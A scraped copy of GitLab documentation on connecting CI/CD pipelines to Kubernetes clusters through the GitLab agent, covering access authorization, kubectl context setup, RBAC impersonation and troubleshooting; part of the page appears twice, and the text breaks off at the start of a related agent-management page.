to** and find the project that contains the [agent configuration file](install/_index.md#create-an-agent-configuration-file) (`config.yaml`). 1. Edit the `config.yaml` file. Under the `ci_access` keyword, add the `groups` attribute. 1. For the `id`, add the path: ```yaml ci_access: groups: - id: path/to/group/subgroup ``` - Authorized groups must have the same top-level group as the agent's configuration project, unless the [instance level authorization](#authorize-all-projects-in-your-gitlab-instance-to-access-the-agent) application setting is enabled. - You can install additional agents into the same cluster to accommodate additional hierarchies. - All of the subgroups of an authorized group also have access to the same agent (without being specified individually). - You can authorize up to 500 groups. After making these changes: - All the projects that belong to the group and its subgroups are now authorized to access the agent. - All CI/CD jobs now include a `kubeconfig` file with contexts for every shared agent connection. - The `kubeconfig` path is available in the `$KUBECONFIG` environment variable. - You can choose the context to run `kubectl` commands from your CI/CD scripts. ### Authorize all projects in your GitLab instance to access the agent {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab Self-Managed {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/357516) in GitLab 17.11. {{< /history >}} Prerequisites: - You must be an administrator. To allow agents to be configured to authorize all projects in your GitLab instance: {{< tabs >}} {{< tab title="Using the UI" >}} 1. In the **Admin** area, select **Settings > General**, and expand the **GitLab agent for Kubernetes** section. 1. Select **Enable instance level authorization**. 1. Select **Save changes**. {{< /tab >}} {{< tab title="Using the API" >}} 1. [Update the application setting](../../../api/settings.md#update-application-settings) `organization_cluster_agent_authorization_enabled` to `true`. {{< /tab >}} {{< /tabs >}} To authorize the agent to access all of the GitLab projects: 1. On the left sidebar, select **Search or go to** and find the project that contains the [agent configuration file](install/_index.md#create-an-agent-configuration-file) (`config.yaml`). 1. Edit the `config.yaml` file. Under the `ci_access` keyword, add the `instance` attribute: ```yaml ci_access: instance: {} ``` After making these changes to the agent configuration file: - All CI/CD jobs in all projects in your instance are authorized to access the agent. You can use CI/CD job impersonation with RBAC to grant or restrict access as needed. For more information, see [Restrict project and group access by using impersonation](#restrict-project-and-group-access-by-using-impersonation). - All CI/CD jobs include a `kubeconfig` file with contexts for every shared agent connection. - The `kubeconfig` path is available in the `$KUBECONFIG` environment variable. - You can choose the context to run `kubectl` commands from your CI/CD scripts. ## Update your `.gitlab-ci.yml` file to run `kubectl` commands In the project where you want to run Kubernetes commands, edit your project's `.gitlab-ci.yml` file. In the first command under the `script` keyword, set your agent's context. Use the format `<path/to/agent/project>:<agent-name>`. For example: ```yaml deploy: image: name: bitnami/kubectl:latest entrypoint: [''] script: - kubectl config get-contexts - kubectl config use-context path/to/agent/project:agent-name - kubectl get pods ``` If you are not sure what your agent's context is, run `kubectl config get-contexts` from a CI/CD job where you want to access the agent. ### Environments that use Auto DevOps If Auto DevOps is enabled, you must define the CI/CD variable `KUBE_CONTEXT`. Set the value of `KUBE_CONTEXT` to the context of the agent you want Auto DevOps to use: ```yaml deploy: variables: KUBE_CONTEXT: path/to/agent/project:agent-name ``` You can assign different agents to separate Auto DevOps jobs. For instance, Auto DevOps can use one agent for `staging` jobs, and another agent for `production` jobs. To use multiple agents, define an [environment-scoped CI/CD variable](../../../ci/environments/_index.md#limit-the-environment-scope-of-a-cicd-variable) for each agent. For example: 1. Define two variables named `KUBE_CONTEXT`. 1. For the first variable: 1. Set the `environment` to `staging`. 1. Set the value to the context of your staging agent. 1. For the second variable: 1. Set the `environment` to `production`. 1. Set the value to the context of your production agent. ### Environments with both certificate-based and agent-based connections When you deploy to an environment that has both a [certificate-based cluster](../../infrastructure/clusters/_index.md) (deprecated) and an agent connection: - The certificate-based cluster's context is called `gitlab-deploy`. This context is always selected by default. - Agent contexts are included in `$KUBECONFIG`. You can select them by using `kubectl config use-context <path/to/agent/project>:<agent-name>`. To use an agent connection when certificate-based connections are present, you can manually configure a new `kubectl` configuration context. For example: ```yaml deploy: variables: KUBE_CONTEXT: my-context # The name to use for the new context AGENT_ID: 1234 # replace with your agent's numeric ID K8S_PROXY_URL: https://<KAS_DOMAIN>/k8s-proxy/ # For agent server (KAS) deployed in Kubernetes cluster (for gitlab.com use kas.gitlab.com); replace with your URL # K8S_PROXY_URL: https://<GITLAB_DOMAIN>/-/kubernetes-agent/k8s-proxy/ # For agent server (KAS) in Omnibus # Include any additional variables before_script: - kubectl config set-credentials agent:$AGENT_ID --token="ci:${AGENT_ID}:${CI_JOB_TOKEN}" - kubectl config set-cluster gitlab --server="${K8S_PROXY_URL}" - kubectl config set-context "$KUBE_CONTEXT" --cluster=gitlab --user="agent:${AGENT_ID}" - kubectl config use-context "$KUBE_CONTEXT" # Include the remaining job configuration ``` ### Environments with KAS that use self-signed certificates If you use an environment with KAS and a self-signed certificate, you must configure your Kubernetes client to trust the certificate authority (CA) that signed your certificate. To configure your client, do one of the following: - Set a CI/CD variable `SSL_CERT_FILE` with the KAS certificate in PEM format. - Configure the Kubernetes client with `--certificate-authority=$KAS_CERTIFICATE`, where `KAS_CERTIFICATE` is a CI/CD variable with the CA certificate of KAS. - Place the certificates in an appropriate location in the job container by updating the container image or mounting via the runner. - Not recommended. Configure the Kubernetes client with `--insecure-skip-tls-verify=true`. ## Restrict project and group access by using impersonation {{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Changed](https://gitlab.com/gitlab-org/gitlab/-/issues/357934) in GitLab 15.5 to add impersonation support for environment tiers. {{< /history >}} By default, your CI/CD job inherits all the permissions from the service account used to install the agent in the cluster. To restrict access to your cluster, you can use [impersonation](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#user-impersonation). To specify impersonations, use the `access_as` attribute in your agent configuration file and use Kubernetes RBAC rules to manage impersonated account permissions. You can impersonate: - The agent itself (default). - The CI/CD job that accesses the cluster. - A specific user or system account defined within the cluster. Authorization configuration can take one or two minutes to propagate. ### Impersonate the agent The agent is impersonated by default. You don't need to do anything to impersonate it. ### Impersonate the CI/CD job that accesses the cluster To impersonate the CI/CD job that accesses the cluster, under the `access_as` key, add the `ci_job: {}` key-value. When the agent makes the request to the actual Kubernetes API, it sets the impersonation credentials in the following way: - `UserName` is set to `gitlab:ci_job:<job id>`. Example: `gitlab:ci_job:1074499489`. - `Groups` is set to: - `gitlab:ci_job` to identify all requests coming from CI jobs. - The list of IDs of groups the project is in. - The project ID. - The slug and tier of the environment this job belongs to. Example: for a CI job in `group1/group1-1/project1` where: - Group `group1` has ID 23. - Group `group1/group1-1` has ID 25. - Project `group1/group1-1/project1` has ID 150. - Job running in the `prod` environment, which has the `production` environment tier. Group list would be `[gitlab:ci_job, gitlab:group:23, gitlab:group_env_tier:23:production, gitlab:group:25, gitlab:group_env_tier:25:production, gitlab:project:150, gitlab:project_env:150:prod, gitlab:project_env_tier:150:production]`. - `Extra` carries extra information about the request. The following properties are set on the impersonated identity: | Property | Description | | ------------------------------------ | ---------------------------------------------------------------------------- | | `agent.gitlab.com/id` | Contains the agent ID. | | `agent.gitlab.com/config_project_id` | Contains the agent's configuration project ID. | | `agent.gitlab.com/project_id` | Contains the CI project ID. | | `agent.gitlab.com/ci_pipeline_id` | Contains the CI pipeline ID. | | `agent.gitlab.com/ci_job_id` | Contains the CI job ID. | | `agent.gitlab.com/username` | Contains the username of the user the CI job is running as. | | `agent.gitlab.com/environment_slug` | Contains the slug of the environment. Only set if running in an environment. | | `agent.gitlab.com/environment_tier` | Contains the tier of the environment. Only set if running in an environment. | Example `config.yaml` to restrict access by the CI/CD job's identity: ```yaml ci_access: projects: - id: path/to/project access_as: ci_job: {} ``` #### Example RBAC to restrict CI/CD jobs The following `RoleBinding` resource restricts all CI/CD jobs to view rights only. ```yaml apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRoleBinding metadata: name: ci-job-view roleRef: name: view kind: ClusterRole apiGroup: rbac.authorization.k8s.io subjects: - name: gitlab:ci_job kind: Group ``` ### Impersonate a static identity For a given connection, you can use a static identity for the impersonation. Under the `access_as` key, add the `impersonate` key to make the request using the provided identity. The identity can be specified with the following keys: - `username` (required) - `uid` - `groups` - `extra` See the [official Kubernetes documentation for details](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#user-impersonation). ## Restrict project and group access to specific environments {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/343885) in GitLab 15.7. {{< /history >}} By default, if your agent is [available to a project](#authorize-agent-access), all of the project's CI/CD jobs can use that agent. To restrict access to the agent to only jobs with specific environments, add `environments` to `ci_access.projects` or `ci_access.groups`. For example: ```yaml ci_access: projects: - id: path/to/project-1 - id: path/to/project-2 environments: - staging - review/* groups: - id: path/to/group-1 environments: - production ``` In this example: - All CI/CD jobs under `project-1` can access the agent. - CI/CD jobs under `project-2` with `staging` or `review/*` environments can access the agent. - `*` is a wildcard, so `review/*` matches all environments under `review`. - CI/CD jobs for projects under `group-1` with `production` environments can access the agent. ## Restrict access to the agent to protected branches {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/467936) in GitLab 17.3 [with a flag](../../../administration/feature_flags/_index.md) named `kubernetes_agent_protected_branches`. Disabled by default. - [Generally available](https://gitlab.com/gitlab-org/gitlab/-/issues/467936) in GitLab 17.10. Feature flag `kubernetes_agent_protected_branches` removed. {{< /history >}} {{< alert type="flag" >}} The availability of this feature is controlled by a feature flag. For more information, see the history. This feature is available for testing, but not ready for production use. {{< /alert >}} To restrict access to the agent to only jobs run on [protected branches](../../project/repository/branches/protected.md): - Add `protected_branches_only: true` to `ci_access.projects` or `ci_access.groups`. For example: ```yaml ci_access: projects: - id: path/to/project-1 protected_branches_only: true groups: - id: path/to/group-1 protected_branches_only: true environments: - production ``` By default, `protected_branches_only` is set to `false`, and the agent can be accessed from unprotected and protected branches. For additional security, you can combine this feature with [environment restrictions](#restrict-project-and-group-access-to-specific-environments). If a project has multiple configurations, only the most specific configuration is used. For example, the following configuration grants access to unprotected branches in `example/my-project`, even though the `example` group is configured to grant access to only protected branches: ```yaml # .gitlab/agents/my-agent/config.yaml ci_access: project: - id: example/my-project # Project of the group below protected_branches_only: false # This configuration supercedes the group configuration environments: - dev groups: - id: example protected_branches_only: true environments: - dev ``` For more details, see [Access to Kubernetes from CI/CD](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/doc/kubernetes_ci_access.md#apiv4joballowed_agents-api). ## Related topics - [Self-paced classroom workshop](https://gitlab-for-eks.awsworkshop.io) (Uses AWS EKS, but you can use for other Kubernetes clusters) - [Configure Auto DevOps](../../../topics/autodevops/cloud_deployments/auto_devops_with_gke.md#configure-auto-devops) ## Troubleshooting ### Grant write permissions to `~/.kube/cache` Tools like `kubectl`, Helm, `kpt`, and `kustomize` cache information about the cluster in `~/.kube/cache`. If this directory is not writable, the tool fetches information on each invocation, making interactions slower and creating unnecessary load on the cluster. For the best experience, in the image you use in your `.gitlab-ci.yml` file, ensure this directory is writable. ### Enable TLS If you are on GitLab Self-Managed, ensure your instance is configured with Transport Layer Security (TLS). If you attempt to use `kubectl` without TLS, you might get an error like: ```shell $ kubectl get pods error: You must be logged in to the server (the server has asked for the client to provide credentials) ``` ### Unable to connect to the server: certificate signed by unknown authority If you use an environment with KAS and a self-signed certificate, your `kubectl` call might return this error: ```plaintext kubectl get pods Unable to connect to the server: x509: certificate signed by unknown authority ``` The error occurs because the job does not trust the certificate authority (CA) that signed the KAS certificate. To resolve the issue, [configure `kubectl` to trust the CA](#environments-with-kas-that-use-self-signed-certificates). ### Validation errors If you use `kubectl` versions v1.27.0 or v.1.27.1, you might get the following error: ```plaintext error: error validating "file.yml": error validating data: the server responded with the status code 426 but did not return more information; if you choose to ignore these errors, turn validation off with --validate=false ``` This issue is caused by [a bug](https://github.com/kubernetes/kubernetes/issues/117463) with `kubectl` and other tools that use the shared Kubernetes libraries. To resolve the issue, use another version of `kubectl`.
--- stage: Deploy group: Environments info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Using GitLab CI/CD with a Kubernetes cluster breadcrumbs: - doc - user - clusters - agent --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - Agent connection sharing limit [changed](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/149844) from 100 to 500 in GitLab 17.0. {{< /history >}} You can use GitLab CI/CD to safely connect, deploy, and update your Kubernetes clusters. To do so, [install an agent in your cluster](install/_index.md). When done, you have a Kubernetes context and can run Kubernetes API commands in your GitLab CI/CD pipeline. To ensure access to your cluster is safe: - Each agent has a separate context (`kubecontext`). - Only the project where the agent is configured, and any additional projects you authorize, can access the agent in your cluster. To use GitLab CI/CD to interact with your cluster, runners must be registered with GitLab. However, these runners do not have to be in the cluster where the agent is. Prerequisites: - Make sure [GitLab CI/CD is enabled](../../../ci/pipelines/settings.md#disable-gitlab-cicd-pipelines). ## Use GitLab CI/CD with your cluster To update a Kubernetes cluster with GitLab CI/CD: 1. Ensure you have a working Kubernetes cluster and the manifests are in a GitLab project. 1. In the same GitLab project, [register and install the GitLab agent for Kubernetes](install/_index.md). 1. [Update your `.gitlab-ci.yml` file](#update-your-gitlab-ciyml-file-to-run-kubectl-commands) to select the agent's Kubernetes context and run the Kubernetes API commands. 1. Run your pipeline to deploy to or update the cluster. If you have multiple GitLab projects that contain Kubernetes manifests: 1. [Install the GitLab agent for Kubernetes](install/_index.md) in its own project, or in one of the GitLab projects where you keep Kubernetes manifests. 1. [Authorize agent access](#authorize-agent-access) in your GitLab projects. 1. Optional. For added security, [use impersonation](#restrict-project-and-group-access-by-using-impersonation). 1. [Update your `.gitlab-ci.yml` file](#update-your-gitlab-ciyml-file-to-run-kubectl-commands) to select the agent's Kubernetes context and run the Kubernetes API commands. 1. Run your pipeline to deploy to or update the cluster. ## Authorize agent access If you have multiple projects with Kubernetes manifests, you must authorize these projects to access the agent. You can authorize agent access for individual projects, groups, or subgroups so all projects have access. For added security, you can also [use impersonation](#restrict-project-and-group-access-by-using-impersonation). Authorization configuration can take one or two minutes to propagate. ### Authorize your projects to access the agent {{< history >}} - [Changed](https://gitlab.com/gitlab-org/gitlab/-/issues/346566) to remove hierarchy restrictions in GitLab 15.6. - [Changed](https://gitlab.com/gitlab-org/gitlab/-/issues/356831) to allow authorizing projects in a user namespace in GitLab 15.7. - [Changed](https://gitlab.com/gitlab-org/gitlab/-/issues/377932) to allow the authorization of groups that belong to different top-level groups in GitLab 18.1. {{< /history >}} To authorize the GitLab project where you keep Kubernetes manifests to access the agent: 1. On the left sidebar, select **Search or go to** and find the project that contains the [agent configuration file](install/_index.md#create-an-agent-configuration-file) (`config.yaml`). 1. Edit the `config.yaml` file. Under the `ci_access` keyword, add the `projects` attribute. 1. For the `id`, add the path to the project. ```yaml ci_access: projects: - id: path/to/project ``` - Authorized projects must have the same top-level group or user namespace as the agent's configuration project, unless the [instance level authorization](#authorize-all-projects-in-your-gitlab-instance-to-access-the-agent) application setting is enabled. - You can install additional agents into the same cluster to accommodate additional hierarchies. - You can authorize up to 500 projects. After making these changes: - All CI/CD jobs now include a `kubeconfig` file with contexts for every shared agent connection. - The `kubeconfig` path is available in the `$KUBECONFIG` environment variable. - You can choose the context to run `kubectl` commands from your CI/CD scripts. ### Authorize projects in your groups to access the agent {{< history >}} - [Changed](https://gitlab.com/gitlab-org/gitlab/-/issues/346566) to remove hierarchy restrictions in GitLab 15.6. - [Changed](https://gitlab.com/gitlab-org/gitlab/-/issues/377932) to allow the authorization of groups that belong to different top-level groups in GitLab 18.1. {{< /history >}} To authorize all of the GitLab projects in a group or subgroup to access the agent: 1. On the left sidebar, select **Search or go to** and find the project that contains the [agent configuration file](install/_index.md#create-an-agent-configuration-file) (`config.yaml`). 1. Edit the `config.yaml` file. Under the `ci_access` keyword, add the `groups` attribute. 1. For the `id`, add the path: ```yaml ci_access: groups: - id: path/to/group/subgroup ``` - Authorized groups must have the same top-level group as the agent's configuration project, unless the [instance level authorization](#authorize-all-projects-in-your-gitlab-instance-to-access-the-agent) application setting is enabled. - You can install additional agents into the same cluster to accommodate additional hierarchies. - All of the subgroups of an authorized group also have access to the same agent (without being specified individually). - You can authorize up to 500 groups. After making these changes: - All the projects that belong to the group and its subgroups are now authorized to access the agent. - All CI/CD jobs now include a `kubeconfig` file with contexts for every shared agent connection. - The `kubeconfig` path is available in the `$KUBECONFIG` environment variable. - You can choose the context to run `kubectl` commands from your CI/CD scripts. ### Authorize all projects in your GitLab instance to access the agent {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab Self-Managed {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/357516) in GitLab 17.11. {{< /history >}} Prerequisites: - You must be an administrator. To allow agents to be configured to authorize all projects in your GitLab instance: {{< tabs >}} {{< tab title="Using the UI" >}} 1. In the **Admin** area, select **Settings > General**, and expand the **GitLab agent for Kubernetes** section. 1. Select **Enable instance level authorization**. 1. Select **Save changes**. {{< /tab >}} {{< tab title="Using the API" >}} 1. [Update the application setting](../../../api/settings.md#update-application-settings) `organization_cluster_agent_authorization_enabled` to `true`. {{< /tab >}} {{< /tabs >}} To authorize the agent to access all of the GitLab projects: 1. On the left sidebar, select **Search or go to** and find the project that contains the [agent configuration file](install/_index.md#create-an-agent-configuration-file) (`config.yaml`). 1. Edit the `config.yaml` file. Under the `ci_access` keyword, add the `instance` attribute: ```yaml ci_access: instance: {} ``` After making these changes to the agent configuration file: - All CI/CD jobs in all projects in your instance are authorized to access the agent. You can use CI/CD job impersonation with RBAC to grant or restrict access as needed. For more information, see [Restrict project and group access by using impersonation](#restrict-project-and-group-access-by-using-impersonation). - All CI/CD jobs include a `kubeconfig` file with contexts for every shared agent connection. - The `kubeconfig` path is available in the `$KUBECONFIG` environment variable. - You can choose the context to run `kubectl` commands from your CI/CD scripts. ## Update your `.gitlab-ci.yml` file to run `kubectl` commands In the project where you want to run Kubernetes commands, edit your project's `.gitlab-ci.yml` file. In the first command under the `script` keyword, set your agent's context. Use the format `<path/to/agent/project>:<agent-name>`. For example: ```yaml deploy: image: name: bitnami/kubectl:latest entrypoint: [''] script: - kubectl config get-contexts - kubectl config use-context path/to/agent/project:agent-name - kubectl get pods ``` If you are not sure what your agent's context is, run `kubectl config get-contexts` from a CI/CD job where you want to access the agent. ### Environments that use Auto DevOps If Auto DevOps is enabled, you must define the CI/CD variable `KUBE_CONTEXT`. Set the value of `KUBE_CONTEXT` to the context of the agent you want Auto DevOps to use: ```yaml deploy: variables: KUBE_CONTEXT: path/to/agent/project:agent-name ``` You can assign different agents to separate Auto DevOps jobs. For instance, Auto DevOps can use one agent for `staging` jobs, and another agent for `production` jobs. To use multiple agents, define an [environment-scoped CI/CD variable](../../../ci/environments/_index.md#limit-the-environment-scope-of-a-cicd-variable) for each agent. For example: 1. Define two variables named `KUBE_CONTEXT`. 1. For the first variable: 1. Set the `environment` to `staging`. 1. Set the value to the context of your staging agent. 1. For the second variable: 1. Set the `environment` to `production`. 1. Set the value to the context of your production agent. ### Environments with both certificate-based and agent-based connections When you deploy to an environment that has both a [certificate-based cluster](../../infrastructure/clusters/_index.md) (deprecated) and an agent connection: - The certificate-based cluster's context is called `gitlab-deploy`. This context is always selected by default. - Agent contexts are included in `$KUBECONFIG`. You can select them by using `kubectl config use-context <path/to/agent/project>:<agent-name>`. To use an agent connection when certificate-based connections are present, you can manually configure a new `kubectl` configuration context. For example: ```yaml deploy: variables: KUBE_CONTEXT: my-context # The name to use for the new context AGENT_ID: 1234 # replace with your agent's numeric ID K8S_PROXY_URL: https://<KAS_DOMAIN>/k8s-proxy/ # For agent server (KAS) deployed in Kubernetes cluster (for gitlab.com use kas.gitlab.com); replace with your URL # K8S_PROXY_URL: https://<GITLAB_DOMAIN>/-/kubernetes-agent/k8s-proxy/ # For agent server (KAS) in Omnibus # Include any additional variables before_script: - kubectl config set-credentials agent:$AGENT_ID --token="ci:${AGENT_ID}:${CI_JOB_TOKEN}" - kubectl config set-cluster gitlab --server="${K8S_PROXY_URL}" - kubectl config set-context "$KUBE_CONTEXT" --cluster=gitlab --user="agent:${AGENT_ID}" - kubectl config use-context "$KUBE_CONTEXT" # Include the remaining job configuration ``` ### Environments with KAS that use self-signed certificates If you use an environment with KAS and a self-signed certificate, you must configure your Kubernetes client to trust the certificate authority (CA) that signed your certificate. To configure your client, do one of the following: - Set a CI/CD variable `SSL_CERT_FILE` with the KAS certificate in PEM format. - Configure the Kubernetes client with `--certificate-authority=$KAS_CERTIFICATE`, where `KAS_CERTIFICATE` is a CI/CD variable with the CA certificate of KAS. - Place the certificates in an appropriate location in the job container by updating the container image or mounting via the runner. - Not recommended. Configure the Kubernetes client with `--insecure-skip-tls-verify=true`. ## Restrict project and group access by using impersonation {{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Changed](https://gitlab.com/gitlab-org/gitlab/-/issues/357934) in GitLab 15.5 to add impersonation support for environment tiers. {{< /history >}} By default, your CI/CD job inherits all the permissions from the service account used to install the agent in the cluster. To restrict access to your cluster, you can use [impersonation](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#user-impersonation). To specify impersonations, use the `access_as` attribute in your agent configuration file and use Kubernetes RBAC rules to manage impersonated account permissions. You can impersonate: - The agent itself (default). - The CI/CD job that accesses the cluster. - A specific user or system account defined within the cluster. Authorization configuration can take one or two minutes to propagate. ### Impersonate the agent The agent is impersonated by default. You don't need to do anything to impersonate it. ### Impersonate the CI/CD job that accesses the cluster To impersonate the CI/CD job that accesses the cluster, under the `access_as` key, add the `ci_job: {}` key-value. When the agent makes the request to the actual Kubernetes API, it sets the impersonation credentials in the following way: - `UserName` is set to `gitlab:ci_job:<job id>`. Example: `gitlab:ci_job:1074499489`. - `Groups` is set to: - `gitlab:ci_job` to identify all requests coming from CI jobs. - The list of IDs of groups the project is in. - The project ID. - The slug and tier of the environment this job belongs to. Example: for a CI job in `group1/group1-1/project1` where: - Group `group1` has ID 23. - Group `group1/group1-1` has ID 25. - Project `group1/group1-1/project1` has ID 150. - Job running in the `prod` environment, which has the `production` environment tier. Group list would be `[gitlab:ci_job, gitlab:group:23, gitlab:group_env_tier:23:production, gitlab:group:25, gitlab:group_env_tier:25:production, gitlab:project:150, gitlab:project_env:150:prod, gitlab:project_env_tier:150:production]`. - `Extra` carries extra information about the request. The following properties are set on the impersonated identity: | Property | Description | | ------------------------------------ | ---------------------------------------------------------------------------- | | `agent.gitlab.com/id` | Contains the agent ID. | | `agent.gitlab.com/config_project_id` | Contains the agent's configuration project ID. | | `agent.gitlab.com/project_id` | Contains the CI project ID. | | `agent.gitlab.com/ci_pipeline_id` | Contains the CI pipeline ID. | | `agent.gitlab.com/ci_job_id` | Contains the CI job ID. | | `agent.gitlab.com/username` | Contains the username of the user the CI job is running as. | | `agent.gitlab.com/environment_slug` | Contains the slug of the environment. Only set if running in an environment. | | `agent.gitlab.com/environment_tier` | Contains the tier of the environment. Only set if running in an environment. | Example `config.yaml` to restrict access by the CI/CD job's identity: ```yaml ci_access: projects: - id: path/to/project access_as: ci_job: {} ``` #### Example RBAC to restrict CI/CD jobs The following `RoleBinding` resource restricts all CI/CD jobs to view rights only. ```yaml apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRoleBinding metadata: name: ci-job-view roleRef: name: view kind: ClusterRole apiGroup: rbac.authorization.k8s.io subjects: - name: gitlab:ci_job kind: Group ``` ### Impersonate a static identity For a given connection, you can use a static identity for the impersonation. Under the `access_as` key, add the `impersonate` key to make the request using the provided identity. The identity can be specified with the following keys: - `username` (required) - `uid` - `groups` - `extra` See the [official Kubernetes documentation for details](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#user-impersonation). ## Restrict project and group access to specific environments {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/343885) in GitLab 15.7. {{< /history >}} By default, if your agent is [available to a project](#authorize-agent-access), all of the project's CI/CD jobs can use that agent. To restrict access to the agent to only jobs with specific environments, add `environments` to `ci_access.projects` or `ci_access.groups`. For example: ```yaml ci_access: projects: - id: path/to/project-1 - id: path/to/project-2 environments: - staging - review/* groups: - id: path/to/group-1 environments: - production ``` In this example: - All CI/CD jobs under `project-1` can access the agent. - CI/CD jobs under `project-2` with `staging` or `review/*` environments can access the agent. - `*` is a wildcard, so `review/*` matches all environments under `review`. - CI/CD jobs for projects under `group-1` with `production` environments can access the agent. ## Restrict access to the agent to protected branches {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/467936) in GitLab 17.3 [with a flag](../../../administration/feature_flags/_index.md) named `kubernetes_agent_protected_branches`. Disabled by default. - [Generally available](https://gitlab.com/gitlab-org/gitlab/-/issues/467936) in GitLab 17.10. Feature flag `kubernetes_agent_protected_branches` removed. {{< /history >}} {{< alert type="flag" >}} The availability of this feature is controlled by a feature flag. For more information, see the history. This feature is available for testing, but not ready for production use. {{< /alert >}} To restrict access to the agent to only jobs run on [protected branches](../../project/repository/branches/protected.md): - Add `protected_branches_only: true` to `ci_access.projects` or `ci_access.groups`. For example: ```yaml ci_access: projects: - id: path/to/project-1 protected_branches_only: true groups: - id: path/to/group-1 protected_branches_only: true environments: - production ``` By default, `protected_branches_only` is set to `false`, and the agent can be accessed from unprotected and protected branches. For additional security, you can combine this feature with [environment restrictions](#restrict-project-and-group-access-to-specific-environments). If a project has multiple configurations, only the most specific configuration is used. For example, the following configuration grants access to unprotected branches in `example/my-project`, even though the `example` group is configured to grant access to only protected branches: ```yaml # .gitlab/agents/my-agent/config.yaml ci_access: project: - id: example/my-project # Project of the group below protected_branches_only: false # This configuration supercedes the group configuration environments: - dev groups: - id: example protected_branches_only: true environments: - dev ``` For more details, see [Access to Kubernetes from CI/CD](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/doc/kubernetes_ci_access.md#apiv4joballowed_agents-api). ## Related topics - [Self-paced classroom workshop](https://gitlab-for-eks.awsworkshop.io) (Uses AWS EKS, but you can use for other Kubernetes clusters) - [Configure Auto DevOps](../../../topics/autodevops/cloud_deployments/auto_devops_with_gke.md#configure-auto-devops) ## Troubleshooting ### Grant write permissions to `~/.kube/cache` Tools like `kubectl`, Helm, `kpt`, and `kustomize` cache information about the cluster in `~/.kube/cache`. If this directory is not writable, the tool fetches information on each invocation, making interactions slower and creating unnecessary load on the cluster. For the best experience, in the image you use in your `.gitlab-ci.yml` file, ensure this directory is writable. ### Enable TLS If you are on GitLab Self-Managed, ensure your instance is configured with Transport Layer Security (TLS). If you attempt to use `kubectl` without TLS, you might get an error like: ```shell $ kubectl get pods error: You must be logged in to the server (the server has asked for the client to provide credentials) ``` ### Unable to connect to the server: certificate signed by unknown authority If you use an environment with KAS and a self-signed certificate, your `kubectl` call might return this error: ```plaintext kubectl get pods Unable to connect to the server: x509: certificate signed by unknown authority ``` The error occurs because the job does not trust the certificate authority (CA) that signed the KAS certificate. To resolve the issue, [configure `kubectl` to trust the CA](#environments-with-kas-that-use-self-signed-certificates). ### Validation errors If you use `kubectl` versions v1.27.0 or v.1.27.1, you might get the following error: ```plaintext error: error validating "file.yml": error validating data: the server responded with the status code 426 but did not return more information; if you choose to ignore these errors, turn validation off with --validate=false ``` This issue is caused by [a bug](https://github.com/kubernetes/kubernetes/issues/117463) with `kubectl` and other tools that use the shared Kubernetes libraries. To resolve the issue, use another version of `kubectl`.
https://docs.gitlab.com/user/clusters/work_with_agent
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/user/clusters/work_with_agent.md
2025-08-13
doc/user/clusters/agent
[ "doc", "user", "clusters", "agent" ]
work_with_agent.md
Deploy
Environments
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Managing the agent for Kubernetes instances
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Use the following tasks when you work with the agent for Kubernetes. ## View your agents The installed `agentk` version is displayed on the **Agent** tab. Prerequisites: - You must have at least the Developer role. To view the list of agents: 1. On the left sidebar, select **Search or go to** and find the project that contains your agent configuration file. You cannot view registered agents from a project that does not contain the agent configuration file. 1. Select **Operate > Kubernetes clusters**. 1. Select **Agent** tab to view clusters connected to GitLab through the agent. On this page, you can view: - All the registered agents for the current project. - The connection status. - The version of `agentk` installed on your cluster. - The path to each agent configuration file. ### Configure your agent To configure your agent: - Add content to the `config.yaml` file optionally created [during installation](install/_index.md#create-an-agent-configuration-file). You can quickly locate an agent configuration file from the list of agents. The **Configuration** column indicates the location of the `config.yaml` file, or shows how to create one. The agent configuration file manages the various agent features: - For a GitLab CI/CD workflow. You must [authorize the agent to access your projects](ci_cd_workflow.md#authorize-agent-access), and then [add `kubectl` commands to your `.gitlab-ci.yml` file](ci_cd_workflow.md#update-your-gitlab-ciyml-file-to-run-kubectl-commands). - For [user access](user_access.md) to the cluster from the GitLab UI or from the local terminal. - For configuring [operational container scanning](vulnerabilities.md). - For configuring [remote workspaces](../../workspace/gitlab_agent_configuration.md). ## View shared agents {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/395498) in GitLab 16.1. {{< 